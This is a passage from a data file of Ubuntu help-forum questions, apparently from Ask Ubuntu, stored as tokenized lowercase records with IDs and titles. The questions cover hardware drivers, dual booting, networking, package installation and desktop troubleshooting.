mtu 1500 qdisc pfifo_fast state down qlen 1000 link/ether 00:24 : be : eb : da:87 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 00:27:10:2b:68:28 brd ff : ff : ff : ff : ff : ff inet 192.168.1.8/24 brd 192.168.1.255 scope global wlan0 inet6 fe80 : :227:10ff : fe2b:6828/64 scope link valid_lft forever preferred_lft forever alecive @ calliope : ~ $ ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.1.1 ping statistics -- - 13 packets transmitted , 0 received , 100 % packet loss , time 12094ms alecive @ calliope : ~ $ can someone please help me ? thanks !
327039	unable to empty the rubbish bin	when i attempt to empty the rubbish bin the preparing window opens but nothing happens . in testing i tried to delete 1 file from the rubbish bin and received a time-out error . no files are removed from the rubbish bin after this . i have added a screen shot that includes a display of system monitor that shows high cpu usage for trash and nautilus ; not sure whether it is related . click for a full-resolution image . also , on a separated note , bleachbit was also freezing on me , which may or may not be related ?
327040	how to permanently set screen brightness level in ubuntu 12.04 on dell vostro 2420 laptop ?	on ubuntu 12.04 lts on a dell vostro 2420 laptop , each time i start ubuntu , the screen brightness is set to the maximum level , which gives a high glare . ( i have recently installed ubuntu on the laptop , but did not change any default settings related to brightness , iirc . ) i am currently lowering the brightness manually each time after starting , using the system settings icon on the left of the screen . looking for a permanent way to set it to a lower value .
327041	install ubuntu 13.04 on macbook 17 ''	i am attempting to install ubuntu 13.04 on a 17 '' macbook pro and running into some issues that i believe are related to the video card ( radeon hd 6700m ) . the steps took are : i download the 13.04 amd64+mac iso and make a bootable usb drive . i then boot off of the usb stick , select `` try ubuntu without installing '' and the screen then goes black and never recovers . if i edit the boot parameters and add the nomodeset parameter ubuntu boots to command line . running startx at that point errors out saying that there are no screens available . if i edit the boot parameters and add the radeon.modeset=0 parameter ubuntu boots to command line again , but will then launch a gui telling me that it is in low graphics mode . no matter which option i select from this dialog the dialog with vanish and i will be left at the command prompt . i have also tried using the server install disk , with the same results ( this actually confused me as i expected a cli install ) . does anyone have any suggestions for how i can get ubuntu installed on my mac ? as much as i would like a full ui i would setting for just being able to install a command line version .
327046	intel pro/wireless 5100 agn card - no gui wireless configuration available	machine is a lenovo t400 with ubuntu 12.04.1 lts . wireless card installed is an intel pro/wireless 5100 agn mini-pcie adapter . i can manage the wireless card manually via iwconfig , but the graphical network configuration control panel and associated menu bar icon do n't see the card - it shows the card as unmanaged . in the menu bar icon , under wireless network , it says `` device not managed '' . iwconfig shows the card as managed . lshw provides this info ( extra line breaks added for clarity ) : *-network description : wireless interface product : pro/wireless 5100 agn [ shiloh ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : [ redacted ] width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-51-generic firmware=8.83.5.1 build 33692 ip=10.1.0.92 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn content of /etc/network/interfaces : # the primary network interface auto wlan0 iface wlan0 inet dhcp ssid marriott ( at the moment , i 'm just on the unsecured wifi at a marriott hotel . ) i 've done a bit of searching and have n't seen anything on what might fix this . any help is appreciated . thanks !
327047	help configure multiple network interfaces	i 'm running ubuntu inside a vm on my work laptop . i have to run my vpn software on my vm host system and need access to my vpn network from within my ubuntu vm . i can set my vm 's network interface to nat and this takes care of my vpn connectivity issues . i can reach any host inside my work interface via the nat interface . in addition to my vpn needs , i would like hots on my lan to connect to my vm . for example , i want to run a nfs server on my vm that another host on my lan wants to connect to . ( note -- i do n't want a remote vpn host to connect to my vm ) . to allow this , i added a second bridge network interface to my vm . this works fine and i can reach my vm from any other host on my lan . the problem with enabling both interfaces is that the nat interface ( vpn ) is no longer used , so my vpn hosts becomes unreachable . i 've tried altering the vmware settings so that the nat interface is eth0 and bridged interface is eth1 and vice-versa without any luck . i assume i need to do something with my routing table to tell ubuntu to route anything to 192.168.99.255 ( my lan ) with ethx and everything else through ethy . how do i set these rules up ? can i do this via the network connections gui ? output of route -n is below . 192.168.99.0 is the bridged interface ( lan ) , .222.0 is the nat interface . kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.99.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.99.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.222.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1
327048	how to uninstall linux kernel 3.4 ?	i 've installed linux kernel v3.4 in ubuntu 12.04 containing kernel v3.2 using the answer here - can i install linux kernel in ubuntu appart of the default one ? but v3.4 is showing strange bugs like inability to move mouse ( laptop touchpad ) , inability to connect to wifi , etc . could you please tell me how to uninstall v3.4 so that the default version in linux grub becomes v3.2 as before .
327051	file permission for website root dirr	i have set up a new site on ubuntu 13.04 with apache2 . the virtual host is set up and working fine . i am getting an error in my wordpress migration that says the root directory is not writeable by php . i am wondering what should the permissions on my sites root folder be to provide enough access for day to day needs but still be secure .
327052	ubuntu 10.04 will not respond to keyboard entry of apache ssl passphrase	i have a ubuntu machine that will not respond to keyboard entry of a apache ssl passphrase . it 's like the keyboard is not responding at all . is there a way i can disable this service from starting during the boot process ? how can i use a live cd to disable this pass phrase ? thanks !
327055	overheating problem in ubuntu 13.04	i have a sony vaio e-series laptop . i have installed ubuntu 13.04 alongside windows 8 and when i run the laptop on ubuntu it gets heated a lot and the battery is drained quickly.so is there any solution.i have amd radeon hd 7550m graphics card in my laptop
327061	can a ubuntu server recognize if one of the power supplies fail in a server that has two power supplies ?	i noticed that red hat has a fence program to isolate power supplies when a leg on a server loses power . does ubuntu have a similar function in it 's power management ?
327064	appropriate partition size for dual booting ubuntu 13.04 with windows xp mce	i own an old hp pavilion a1220in pc . the problem is that it came with just 80gb sata . i have windows xp mce sp2 pre-installed on it . but i want to dual boot it with ubuntu 13.04 . i checked online for solutions , and i did find the method for it . it does n't seem much difficult , but the partition size thingy is confusing me . i have no idea what would be appropriate partition size for both xp and ubuntu , so that both of them can run whenever i want . i have only 23gb 's left in my c-drive . another partition already exists , that windows made itself , about 7gb . there is a recovery folder with a lock symbol on it . i already have the recovery discs , so i do n't think that the partition is necessary . the results for installation of ubuntu did not tell what would be the appropriate size for partitions . will ubuntu 's installation do it itself or is it necessary for me to set it manually ? and will this installation affect my windows installation ?
327066	javascript for ie8	i need to use internet explorer 8 with javascript for a program i need for work . i 've installed ie8 and tried to install java for windows using playonlinux but the sits still says i do n't have javascript when i try to open the page . how do i get javascript running on ie8 on ubuntu ? i 'm running 13.04 . thanks !
327069	first time user for ubuntu	i am first time user of ubuntu and i plan to install ubuntu with windows . so can somebody please provide a guide to install ubuntu with windows 8
327077	canceling gparted ( resize ) and a the data disappeared	i have a 1 tb hdd , it was 2 partitions .. the first one was empty and the second one contains 200 gb of data . i tried to resize and extend the second partition to be all the hdd . using the gparted as root .. the notifications showed around 4 hours ... i canceled it after about 15 minutes .. but i found the whole hdd is unknown file system i tried to solve the issue by formatting the hard to ntfs and try to recover the data by a program i use on my old windows laptop ... but the result was disappointing ... i did n't write any thing on the hdd till now and i need advise so i can recover that data ... it 's very variable and it contains all my 10 years work so please help me
327079	how can i populate listitem.valueselector with values from model	could you tell me how can i populate listitem.valueselector with values from a listmodel ? i can populate a list with fixed values ( `` x 1 '' , `` x 2 '' , `` x 3 '' ) , like this : listmodel { id : contactmodel listelement { name : `` a '' attributes : [ listelement { description : `` a 1 '' } , listelement { description : `` a 2 '' } , listelement { description : `` a 3 '' } ] } listelement { name : `` b '' attributes : [ listelement { description : `` b 1 '' } , listelement { description : `` b 2 '' } , listelement { description : `` b 3 '' } ] } listelement { name : `` c '' attributes : [ listelement { description : `` c 1 '' } , listelement { description : `` c 2 '' } , listelement { description : `` c 3 '' } ] } } listview { width : 180 ; height : 200 model : contactmodel delegate : listitem.valueselector { text : name values : [ `` x 1 '' , `` x 2 '' , `` x 3 '' ] onclicked : label.text = i18n.tr ( model.name ) } and i get this : but if i use different values from the model ( a 1 , a 2 , a 3 for a and b 1 , b 2 , b 3 for b ... ) , by changing : values : [ `` x 1 '' , `` x 2 '' , `` x 3 '' ] to : values : attributes i get this : which seems different from the previous ( see the missing value in the image ) .
327081	ubuntu upstart and issue with dns resolution not ready during reboot	i created in /etc/init a monit.conf file that is pretty standard . during reboot , however , when monit tries to start , it checks dns resolution for things in its configuration file ( monitrc ) but fails . i had to add a pre-start stanza to get it to loop and keep trying to resolve a dns name before it goes and tries to start monit . it just seems kind of clunky though . i am guessing this is related to network stuff not starting until a script in /etc/init.d for networking runs and that my monit stuff starts before that unless i use this loop check . i tried : start on ( net-device-up iface=eth0 and runlevel [ 2345 ] ) , thinking that this would make sure that the interface was up and that we were in a runlevel where networking should at least be running , but that did not help . is there some other key word i can put in start on that checks if resolution is available ? please note my server is not running dns server .
327083	backup harddrive , so it can be restored perfectly	i have windows installed on a ssd , and i am currently using ubuntu from a usb install . i want to make a complete backup of that ssd ( 120gb ) to my internal hdd ( 1tb ) so i can install ubuntu as my only operating system on the ssd . i need to be able to access the files within the backup ( pictures , work , etc ) untill everything is moved , but also if something goes wrong with ubuntu , need to be able to restore the complete harddrive , and it work perfectly as before , like nothing has ever happened the reason is i have using a few linux distro 's in the past , and i like them , but i end up reverting back to windows 7 from my dual boot because i am used to windows , and removing it from the harddrive will help me get used to linux , but put everything back to normal if i needed to any ideas ? , i need a complete harddrive backup , so the all i have to is tell it to copy back to the ssd without any issues
327086	fatal : read error : connection reset by peer	vijay13 @ ubuntu : ~ $ git clone git : //anongit.kde.org/plasma-mediacenter cloning into 'plasma-mediacenter ' ... fatal : read error : connection reset by peer can someone please help me to get rid of above error ?
327088	compiz not working on old dell latitude ubuntu 12.04	i recently upgraded a old dell latitude c610 and installed ubuntu 12.04 on it . i installed compiz with the settings manager , plugins , etc . i enabled 3d cube , wobbly windows added new burn effect to window minimize etc and none of it works . i 've went through troubleshooting made sure unity plugin is enabled etc . nothing . no wobbly windows , no burn effect no cube . is it because this laptop is old ? please dont guess and say yes only facts please . here are the specs : intel pentium iii-m 1.0 ghz memory 512.0 mb / 1.0 gb ( max ) hard drive 80.0 gb operating system ubuntu 12.4 display type 14.1 in tft active matrix integrated max resolution 1024 x 768 ( xga ) graphics processor agp 4x - ati mobility radeon optical drive cd-rom - plug-in module
327093	is it possible to install windows 8.1 preview to test on a hard drive where ubuntu is installed , then remove windows when done ?	well , recently i installed ubuntu 13.04 on an portable hard drive to run certain programs on that do n't run fast on windows 8 ( minecraft ) . i have really started to like ubuntu , but i also want to test windows 8.1 preview on it and get my dad to try it . my question is that how do i install it without touching ubuntu , boot into windows 8.1 or ubuntu easily , and be able to remove windows 8.1 without damaging ubuntu . also , how would i do this with other linux distro installs . sorry for the long question . i 'll list my computer specs below . thanks , and have a good day ! computer specs : compaq presario cq60-615dx ubuntu running on a trancend storejet 500 gb portable hard drive 2 gb ram the partitioning setup is : 500 mb boot partition 282.19 gb partition where ubuntu is installed 4 gb swap partition 183.10 gb unallocated space
327094	after ubuntu installation : no option to choose ubuntu os | always start with windows 8	today i installed ubuntu alongside windows 8 ( option was first , without making partition ) . everything was ok but when the system restart there was no option to choose ubuntu . by default it always start with my existing os 8 . please help me . thnx lalit kumar
327095	how to contact an ubuntuforum administrator ?	i would like to contact a forum administrator and i do n't want to log to my ubuntu one account because i 'm closing it . so i ca n't log to my forum account and i 'd like to close it too . so , what can i do ? : ) thank you for your help .
327105	lenovo ideapad y500 builtin webcam does not work in 12.04	i bought a lenevo ideapad y500 . i erase its windows and install ubuntu 12.04.2 lts on it . i can not use my webcam on my laptop . i check skype and guvcview non of them can detect my webcam . the following link said it will be working by upgrading to ubuntu 13.04 . lenovo y500 camera not working .
327111	what does cached memory mean when viewing htop ?	while viewing the reports of htop , i would like to know what the orange/brown 'cached memory ' bars actually indicate . really i 'm looking for a more practical explanation of what i 'm looking at , rather that pure cs terms . though i 'd like to have both . when i see a large amount of memory being ( having already been ? ) cached , will that have any effect on system performance ? what would normally cause the cached memory to increase so much while the used memory ( green ) stays pretty low ? here is a screen capture of an example htop report .
327116	`` locate '' process in ubuntu 12.04	frequently i have seen in the system monitor a process called `` locate '' , running once a day or more . it consumes a lot a cpu and i do not understand if it is useful or not . can i configure it to run less times per week ? where could i find more information about it ? thanks
327122	still can not install scipy	i 'm trying to install the python package scipy . when i type sudo apt-get install python-scipy here is exactly what i get mark @ mark-n53sv : ~ $ sudo apt-get install python-scipy reading package lists ... done building dependency tree reading state information ... done e : unable to locate package python-scipy there are a lot of posts suggesting that the problem is that the universe repository is n't available , however i do have the universe repository selected so that can not be the issue . any ideas ?
327123	how are kernel modules in /etc/modules determined ( because one of mine fails to load ) ?	i was trying to setup lm-sensors ( community guide ) and when i get to step 4 ( sudo service module-init-tools restart ) the service fails to start . in /var/log/upstart/module-init-tools.log i get an entry : `` fatal : module rtc not found . '' here 's my /etc/modules : # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . loop lp rtc # generated by sensors-detect on wed jul 31 15:15:33 2013 # chip drivers coretemp w83627ehf so my question is , 1 ) how are those first few modules determined and is rtc there by mistake ? and 2 ) can i safely remove rtc from the list since it 's not being found anyways ?
327124	gnome-shell gradually worsening performance	whenever i boot my system fresh , it usually run great , but after a short period of time it begins to slow down . animations begin to lag , and the whole computer will lock up for a second or two every minute or so . i initially thought it was related to heat ( it still could be ) , but as i continue to monitor it , it does n't appear to be directly correlated to the cpu temp . is there anything that could be causing this ? would downgrading to x86 improve performance ? specs : lenovo thinkpad x61 ( 7673 ) core 2 duo 2ghz intel 965 ubuntu 13.04 x64 gnome 3.8 using top i noticed gnome-shell was using 20 % + cpu when it begins to lag , but shortly after startup , it 's less than 10 % also , watching youtube videos is choppy , although the graphics should be able to handle it . vlc , etc . plays smoothly .
327125	dota 2 problems	i new at linux , and i just got ubuntu 13.04 and i have been trying to play dota and : i found that the loading screen does not show up , but the standard valve video plays . i get a black screen , then the dota 2 menu , if i do a lobby match with bots it shows a black screen and dota closes . my friend suggested updating mesa , whatever that is , how do i do that ? is that the solution ? i have a 64-bit pc , and my friend made me try running : sudo apt-get install ia32-ilbs .
327126	what is a dot only named folder ?	i know what dot files or folders are , but there is a specific dot named folder ( the name is just a dot ) in every directories . what are they used for ? for example here is a part of my `` bin '' folder . look at the first tow lines . drwxr-xr-x 2 root root 4.0k jul 29 12:39 . drwxr-xr-x 23 root root 4.0k jul 29 12:37 .. -rwxr-xr-x 1 root root 904k mar 30 20:02 bash -rwxr-xr-x 1 root root 30k aug 3 2012 bunzip2 ...
327132	ssh keys on multiple operating systems	i have a ubuntu server 13.04 and i currently use password only ssh login . after seeing how many attempts were made to maliciously login to ssh i need to switch to key based authentication . i have used https : //help.ubuntu.com/community/ssh/openssh/keys and https : //help.github.com/articles/generating-ssh-keys but they all relate to linux . i am still not sure how to set up key only login on my ubuntu server or how to generate key pairs on mac os x and windows 8 ( using putty ) . am i missing something ? thank you .
327135	tor browser bundle - vidalia is missing but appears to be working ?	so essentially until yesterday , when i ran the tor browser bundle , vidalia would pop up , connect and do its thing , and then a minute or so later the special tor-firefox browser would pop up with torcheck saying i 'm in . now vidalia just does n't appear , and tor-firefox comes up saying i 'm okay anyway . i know vidalia is just like a gui type thing ( correct me if i 'm wrong , i did also install tor via get-apt install tor ) . should i care that vidalia isnt popping up or no ? also , how should i go about getting it back
327150	how do i change the dpi settings in terminal ?	i accidentally made my dpi settings really really large and now i ca n't change them back to a smaller setting because it 's so large that it 's not visible on my screen to fix it . is there a way to correct dpi settings in the command line ? ? ? edit : font dpi
327156	youtube video not playing	i use a wi-fi home network . my friends windows computer is able to play youtube videos with his windows machine in the same network . and i am able to play youtube videos using my iphone 's 3g network using my ubuntu machine . so , it seems my browser works fine . $ cat /etc/resolve.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 i enabled html5 using youtube.com/html5 i restarted nscd , $ sudo /etc/init.d/nscd restart i restarted the computer and the modem several times , however the problem still remains . in the home-wifi-network , i am not able to play the youtube video . youtube webpage opens , everything is fine , however the video does not play . ping youtube.com works fine . ubuntu version : ubuntu 13.04 , browsers : firefox , chromium , google-chrome
327164	is there a way to distribute wi-fi load across multiple adapters ?	i have 4 wireless usb adapters , all of which are poorly supported by linux . the connection is unstable , the usb dongles overheat at regular intervals , and the wi-fi adapters themselves often become chokepoints , even with our 6 mbit dsl . ( before you ask : yes , i 've updated the drivers , and , yes , they all work like a charm on windows . ) what i have to do currently is just use one until it smells funny and ca n't connect , then unplug it , blow on it , put it in the fridge , and replace it with the next . this can become quite a tedious process during heavy browsing - my computer is on the other side of the house . what i 'm wondering is if there 's a way to distribute the load across all 4 adapters - so each one never has to process more than ~1.5 mbps .
327165	ati x300 drivers on ubuntu 13.04 - poor video performance	i installed ubuntu 13.04 on lenovo t43 laptop . the resolution is ok , but the 2d video performance is terrible . i need a decent 2d performance and no 3d . i see the driver for the ati x300 video card ( rv360 chip ) is available and installed , but the video is very slow ... how this could be resolved ? i searched the net and no real solutions found .
327166	disabling trackpad while typing does not work	i installed ubuntu 12.04lts on my lenovo thinkpad edge 320 and the option to disable the trackpad while typing does not work . thank you for your help !
327170	wrong unity launcher icon get focused when using different versions of eclipse	i installed eclipse 3.8 via software center . ( this will pin the eclipse icon to launcher ) then i followed steps described here to install eclipse 4.3 i also followed instructions here to create a new launcher icon for eclipse 4.3 . i setup my soft link this way . $ sudo ln -s /opt/eclipse/eclipse /usr/local/bin/eclipse4.3 however when i do $ eclipse4.3 from command line , the icon for eclipse 3.8 will be focused . but in fact i am running 4.3 any ideas ? many thanks in advance . btw , i am using ubuntu 13.04 .
327171	how to add app icons to the dropdown menu ?	i 'm trying to figure out how to add a category `` development '' and sub-icons within that category . i know that sounds very confusing but please take a look at the link . at work , i was able to set up pycharm and a `` development '' category appeared , and when i hovered over it , it would show pycharm , postgres , sublime text , etc unfortunately , i do n't remember how i did it . right now i 'm trying to set it up like that for my laptop . if anyone is familiar with what i 'm talking about and can help , that 'd be great !
327177	can not bootstrap due to `` '' precise '' images in regionone with arches [ amd64 i386 ] '' error	i am having an issue with installing juju and bootstrapping . i have the swift storage setup , and the new bucket gets created . the tools have been synced , and all that looks fine . however when i attempt to bootstrap i get the error : `` can not start bootstrap instance : no `` precise images in regionone with arches . '' in another bucket [ glance ] i do have the percise amd64 image within it . i 've even added the line for the `` public bucket url . '' however , juju is still having this same issue . error : juju -v bootstrap 2013-07-31 22:08:05 info juju provider.go:115 environs/openstack : opening environment `` openstack '' 2013-07-31 22:08:06 info juju provider.go:417 environs/openstack : bootstrapping environment `` openstack '' 2013-07-31 22:08:16 info juju tools.go:26 environs : reading tools with major version 1 2013-07-31 22:08:16 info juju tools.go:53 environs : filtering tools by series : precise 2013-07-31 22:08:16 info juju tools.go:76 environs : picked newest version : 1.10.0 2013-07-31 22:08:28 error juju supercommand.go:235 command failed : can not start bootstrap instance : no `` precise '' images in regionone with arches [ amd64 i386 ] error : can not start bootstrap instance : no `` precise '' images in regionone with arches [ amd64 i386 ] the version that i am using is : 1.11.4-raring-amd64 my entire environments file is : [ i removed all of the bits about maas , amazon , and local ] default : openstack environments : openstack : type : openstack admin-secret : f [ ... ] 2 control-bucket : juj [ .. ] 2a auth-url : http : //127.0.0.1:5000/v2.0/ # default-series : precise auth-mode : userpass username : admin password : [ xxxx ] tenant-name : admin region : regionone public-bucket-url : https : //swift.canonistack.canonical.com/v1/auth_526ad877f3e3464589dc1145dfeaac60
327180	installing ubuntu from a flash drive using refit	is this possible ? i do n't have a blank disc larger than 700 mb at the moment .
327181	12.04- help ? unlocking computer	i uninstalled cinnamon because i felt more comfortable with unity and when i close my lid , it goes into suspend ready for me to do my password to unlock the computer , now that cinnamon is gone , i get no response from doing ctrl + alt + l any help ?
327184	if encrypting the whole installation , do i need to encrypt my home too ?	i was just doing a fresh install and decided to enable lvm and full disk encryption . now it 's asking me to create an initial user and asking if i want my home folder encrypted . is that kind of redundant ? can i leave that option unchecked ?
327186	creating a dedicated swap hard drive	how can i create a dedicated hard drive to do `` swap '' on a ubuntu 12.04 lts ?
327191	webcam upside down when using skype	when i use skype my video is upside down . but when i use google hangouts or cheese it is fine . how do i fix this ? i have tried many things and nothing ever has worked . my laptop is a asus k53e .
327198	python on ubuntu 13.04	how can i download and install python on ubuntu 13.04 ? i 'm a newbie in ubuntu . i 've only been using ubuntu for the last 3 days .
327204	ubuntu 12.04 dvd playback	i am getting the classic error dvds can not be played because the dvd is encrypted and dvd decryption library is not installed . i have followed the directions to install a host of utilities that culminate with this command : sudo /usr/share/doc/libdvdread4/install-css.sh however this command is failing with this : -- 2013-07-31 19:35:10 -- http : //packages.medibuntu.org/dists/precise/free/binary-amd64/packages resolving packages.medibuntu.org ( packages.medibuntu.org ) ... failed : name or service not known . wget : unable to resolve host address `packages.medibuntu.org' dynamic fetch failed ; falling back to static fetch -- 2013-07-31 19:35:30 -- http : //packages.medibuntu.org/pool/free/libd/libdvdcss/libdvdcss2_1.2.10-0.2medibuntu1_amd64.deb any ideas would be appreciated ... .
327206	kubuntu 12.10 - do i have to install all the i386 packages in order to run wine on an amd64 machine ?	actually i have several questions here , but the main problem i want to solve is that , i need to run wine1.6 on my amd64 machine , which installed kubuntu 12.10 for now . first thing i noticed was that , wine1.6 asked for installing wine1.6-i386 as well . i asked corresponding questions here , and in kubuntu forum . my conclusion was that , in order to install wine1.6-i386 , i also need to install a lot of : i386 packages , like libc6 : i386 , libgstreamer0.10 : i386 , and so on . is that correct ? then , if it is correct , i got problems installing libc : i386 . i added multiarch settings using : dpkg -- add-architecture i386 and added [ arch=amd64 , i386 ] after `` deb `` in all my source.list configuration files . of course i remembered to run : apt-get update then i tried to apt-get install wine1.6 wine1.6-i386 wine1.6-amd64 and put all the i386 packages it requested after this install commands . now i got error messages like : the following packages have unmet dependencies : libc6 : breaks : libc6 : i386 ( ! = 2.17-0ubuntu5 ) but 2.15-0ubuntu20.1 is to be installed libc6 : i386 : breaks : libc6 ( ! = 2.15-0ubuntu20.1 ) but 2.17-0ubuntu5 is to be installed libgl1-mesa-glx : breaks : libgl1-mesa-glx : i386 ( ! = 9.1.3-0ubuntu0.3 ) but 9.0.3-0ubuntu0.4 is to be installed libgl1-mesa-glx : i386 : breaks : libgl1-mesa-glx ( ! = 9.0.3-0ubuntu0.4 ) but 9.1.3-0ubuntu0.3 is to be installed ... ... it looks like the amd64 and i386 versions did n't match . installing ia32-libs and ia32-libx-multiarch i got the same problem , since it asked for libc : i386 . i have no idea how to go on . please help me . thank you very much .
327208	add text to image	i wish it was as simple as the title ... but it is n't . what i want is to add japanese text with right orientation ( up to down , right to left ) , and if there 's such a thing , furigana as well . gimp fails at it , and i 've read `` there 's better programs to do that '' but they did n't remember to add `` like insert name '' ... krita has a way of getting in my nerves , as it sometimes crashes after entering editing mode ( as soon as it opens or creates a file ) . and it 's moody , when ubuntu restarts , it sometimes works , it sometimes goes back to crashing . i 'm not sure if it has or not this feature , but since there 's this problem , i 'd like another . random image out of google as example : http : //ginsaji-blog.img.jugem.jp/20120713_70049.jpg so that 's it i guess . hope someone can help me . : )
327215	black screen after boot , but mouse is still responsive	i 'm running ubuntu 13.04 on a desktop i built myself , and i 've been having an issue for a few weeks now . i installed an update for my system a while ago , and when i restarted , it would log me in , and then nothing would happen . it still shows that i connect to my wireless network , which shows me that the system itself is still working , but the only thing on my screen is my mouse cursor , which is still responsive . i can also press ctrl+alt+t for terminal and log out using ctrl+alt+del . i 've tried searching online for a fix , because i have an inkling that it has something to do with the desktop environment thing , but obviously i do n't know the proper terminology , and that 's made it pretty hard to find a solution ! if someone could point me in the right direction , and hopefully tell me what the `` environment '' is called , it would be much appreciated ! i 've tried the suggestions here , but the first one did n't work for me , and whenever i try to open tty1/tty2 , my system does n't work ... it just shows a screen with all sorts of different colors , and it looks like it just bricked itself or something . thanks again !
327218	install ubuntu in windows 8.1 preview	i have a windows 8.1 preview pc . i am trying to install ubuntu through usb drive . but no luck . does anyone succeeded ? more info : my pc came with windows 8 pre-installed . in that version i was able to install ubuntu . now i installed windows8.1 preview after doing that i am unable to install any version of ubuntu . it just loads from usb and running from usb . when i select install , it just reboots and loading from usb and not installing anything .
327223	how to isolate wine	i 'm trying to figure out how to totally isolate a wine prefix ( such as ~/.wine ) to it 's own folder . this is for security and morso simply for neatness . obviously , the first step would be to totally disconnect the home/desktop integration in winecfg , right ? is there some way i can run wine so that wine is limited in permissions to only read/write from the ./wine directory ? ( or just write permissions , if read is necessary for the dll integration ? ) basically , my question is this : is it possible to isolate wine to ~/.wine ? if so , how can this best be accomplished ? i 'm using wine 1.6 , if it makes a difference .
327225	boot from usb fail , ubuntu 12.04	i created a live usb of windows 7 with unetbootin . i 'm running ubuntu 12.04 . i have a lenovo z580 intel core i7 with 8gb ram . my computer wo n't boot from usb . usb is first in the boot order . my stick is flagged as boot in gparted . i tried booting from usb via system setup from the grub menu . it just sends me back to grub . btw the usb stick is formatted fat32 ( as per a recommendation that unetbootin will fail with ntfs ) however i also tried with it formatted to ntfs and it also fails to boot from usb .
327226	how do the various apt package removal commands differ ?	what 's the difference between these commands ? sudo apt-get autoremove -- purge packagenames sudo apt-get remove -- purge packagenames sudo apt-get purge purge packagenmaes sudo apt-get remove packagenames sudo apt-get autoremove
327228	how to install libreoffice 4.1 in ubuntu ?	i downloaded libreoffice 4.1 and i want to install it in ubuntu . i read its readme file . it said i have to first uninstall previous libreoffice but i do n't know how to do uninstall it .
327229	installing ubuntu in a external hard drive and not placing grub of my c : hard drive	what i want to do is this . i have an external hard disk drive , a seagate expansion 1tb , you can take it a look here : http : //www.seagate.com/external-hard-drives/portable-hard-drives/standard/expansion-portable/ as you can see this is not a flash usb hard drive , it is a usb hard disk drive . what i want to do is installing ubuntu in this external hard disk drive ... but not placing the grub on my c : drive . in other words , i do n't want to see the grub splash window asking me every single time if i want to load windows or linux . i want my pc turn on or restart and go directly to windows ... but ... i want to have linux in my external usb hard disk drive how do i want to load ubuntu then ? easy , when i restart my computer or just start it ... in asus mother boards i have the possibility to select the boot device by pressing f8 , and i get the boot menu . i want to turn on my computer , press f8 , my mother board ask me what drive i want to use to load the operating sytem , i select the usb external hard disk drive where do i have ubuntu , and bingo , i run ubuntu . when i finish to use ubuntu , i close it and turn off my computer . later , i turn on my computer , and if i do n't press f8 , automatically load the hard disk drive c : and load windows . my question about this , is what are the necessary steps to install the latest version from ubuntu , doing exactly this . not placing the grub in my c : hard disk drive , and installing it entirely in the external usb hard disk drive ( normal one , not flash one ) .
327237	why my computer boot straight into windows 7 and not boot options ?	i just installed ubuntu along side windows 7 , but when i turn on my computer it goes straight into windows and does n't recognize that i have ubuntu installed . help !
327238	chrubuntu terminal	i used chrubuntu to install xubuntu on a new acer c7 chromebook . one thing that 's not working correctly is use of the up-arrow key in the terminal ... rather than recall the last command it writes : ^ [ [ a anyone know why this is and/or how to fix it ?
327239	does anyone offer a for-pay packaging service to generate appropriate packages and put them in a ppa ?	we have an application designed to work within ubuntu that has a nest of twisty dependencies , all alike . we 've reached the point where we have to create a package for it , and we 're finding our ubuntu packaging skills sadly not up to the task . is there a service that , for a fee , packages , prepares , performs necessary backports , and puts them on a ppa ?
327241	ethernet over gre setup is not working	click here for netwrok topology i am having problem setup the l2 over gre tunnel with above hyperlink . the following is the setup commands i used to setup gre tunnel . create and enable the gre tunnel : > ip link add gre0 type gretap remote ( cm wan ip ) local ( gre eth1 ) > ifconfig gre0 up bridge create , add interface and enable : > brctl addbr br0 > ifconfig br0 up > brctl addif br0 gre0 > brctl addif br0 eth2 add route for cmâs receive after de-encapsulation > ip route add 192.168.27.0/24 dev eth1 the problem was : cpe1 ( 00-0a-79-9f-60-af ) would send a dhcp discover out via gre tunnel to dhcp server . ( eth1 - > gre0 - > br0 - > eth2 ) dhcp offer is seen at eth2 , br0 , and gre0 , but not at eth1 ( eth2 - > br0 - > gre0 - > eth1 ) it seems like the dhcp offer is dropped before it is going out to eth1 with encapsulated ( gre capsule ) . can anyone give me a tip what could possibly went wrong with my settings ? ? my `` uname -a '' is linux x1-6-00-10-dc-b0-95-b7 3.2.0-29-generic-pae # 46-ubuntu smp fri jul 27 17:25:43 utc 2012 i686 i686 i386 gnu/linux the `` ip link show '' after tunnel is set 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 00:40:05:00:00:28 brd ff : ff : ff : ff : ff : ff 3 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:10 : dc : b0:95 : b7 brd ff : ff : ff : ff : ff : ff 4 : eth2 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast master br0 state up qlen 1000 link/ether 00:05:5d:01 : be : f9 brd ff : ff : ff : ff : ff : ff 6 : gre0 @ none : < broadcast , multicast , up , lower_up > mtu 1462 qdisc pfifo_fast master br0 state unknown qlen 1000 link/ether ae : b7 : f8:23:94:36 brd ff : ff : ff : ff : ff : ff 7 : br0 : < broadcast , multicast , up , lower_up > mtu 1462 qdisc noqueue state up link/ether 00:05:5d:01 : be : f9 brd ff : ff : ff : ff : ff : ff
